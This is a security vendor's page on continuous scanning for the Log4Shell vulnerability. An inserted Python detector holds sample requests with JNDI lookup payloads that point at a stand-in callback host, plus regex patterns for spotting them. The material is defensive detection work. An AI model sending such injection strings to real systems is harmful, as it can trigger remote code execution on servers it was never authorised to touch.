Continuous monitoring for Log4j vulnerabilities

Detectify now checks for the critical and actively exploited Apache Log4j vulnerability CVE-2021-44228, a.k.a. Log4Shell. Customers can start scanning their assets straight away. New to Detectify? Start a trial today and get unlimited scanning for two weeks.


How has the Log4j threat impacted software?

The CVE-2021-44228 Apache Log4j RCE vulnerability allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from attacker-controlled LDAP and other JNDI endpoints when message lookup substitution is enabled.

Some of the software identified as potentially vulnerable includes Solr, Druid, Flink, Struts2, Logstash, Redis, Elasticsearch, Kafka, Pulse Secure, Spark, and Tomcat.

Read more in our blog post.

Crowdsourcing security is a must

Thanks to our ethical hacking community, Crowdsource, we have received a variety of proofs of concept with valid payloads for the CVE-2021-44228 Apache Log4j RCE, and Detectify customers continue to benefit from the growing testbed for better coverage of this critical vulnerability.

How extensively does Detectify check for Log4j vulnerabilities?

Detectify Surface Monitoring sends payloads in request headers and URLs (and, in some cases, query parameters). We currently send over 20 payload-carrying requests for the Log4j vulnerability to our customers' assets (including GET request parameters in some tests). When we send a payload and then observe a DNS lookup for the callback domain we control, we produce a vulnerability finding.

Examples of technologies we scan for:

  • VMware vCenter
  • Apache Struts
  • VMware Horizon
  • Apache Solr

In Application Scanning, customers have access to all of the above and more. Detectify scanning engines crawl customer applications and then extensively fuzz all parameters, such as cookies, JSON keys, and query parameters. We also send payloads at certain events, such as when the application returns an error. If we receive a DNS callback, a vulnerability finding is triggered.
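A defender-side complement to the scanning described above, added here as an example and not Detectify's own code: it inspects the request fields the page names (URL and headers) for Log4j lookup syntax, URL-decodes query parameters first, and grades each hit so an application team can alert on scanner traffic and real probes alike. The sample requests and the `oob.example` callback host are constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample requests (not from the original page): the URL and headers
# are the fields in which the scanner described above places its payloads.
SAMPLE_REQUESTS = [
    {"url": "/search?q=shoes", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"url": "/login", "headers": {"X-Api-Version": "${jndi:ldap://oob.example/x}"}},
    {"url": "/api?id=%24%7Bjndi%3Adns%3A%2F%2Foob.example%2Fa%7D", "headers": {}},
    {"url": "/", "headers": {"Referer": "${env:HOME}"}},
    {"url": "/", "headers": {"User-Agent": "build ${version}"}},
]

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)
LOOKUP_RE = re.compile(r"\$\{\s*([a-z]+)\s*:", re.IGNORECASE)
# JNDI schemes that fetch from a remote endpoint; a hit here is the out-of-band
# callback pattern the scanner watches for.
REMOTE_SCHEMES = {"ldap", "ldaps", "rmi", "dns", "iiop", "corba", "nds", "http"}

def decode(value: str) -> str:
    """URL-decode up to twice so encoded query parameters are inspected in clear."""
    prev = value
    for _ in range(2):
        cur = unquote(prev)
        if cur == prev:
            break
        prev = cur
    return prev

def inspect_field(value: str) -> Optional[str]:
    """Grade one request field: 'high', 'medium', 'low', or None if clean."""
    text = decode(value)
    m = JNDI_RE.search(text)
    if m:
        return "high" if m.group(1).lower() in REMOTE_SCHEMES else "medium"
    if LOOKUP_RE.search(text):
        return "medium"  # non-JNDI lookup such as ${env:...}: still probing substitution
    if "${" in text:
        return "low"     # bare lookup syntax; worth logging while the situation evolves
    return None

def classify_request(req: Dict) -> List[Tuple[str, str]]:
    """Return (field, severity) for every field of a request carrying lookup syntax."""
    fields = {"url": req["url"], **{f"header:{k}": v for k, v in req["headers"].items()}}
    return [(name, sev) for name, value in fields.items() if (sev := inspect_field(value))]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["url"], classify_request(req))
```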

Please note: due to the evolving nature of the situation, we may change how we scan for Log4j.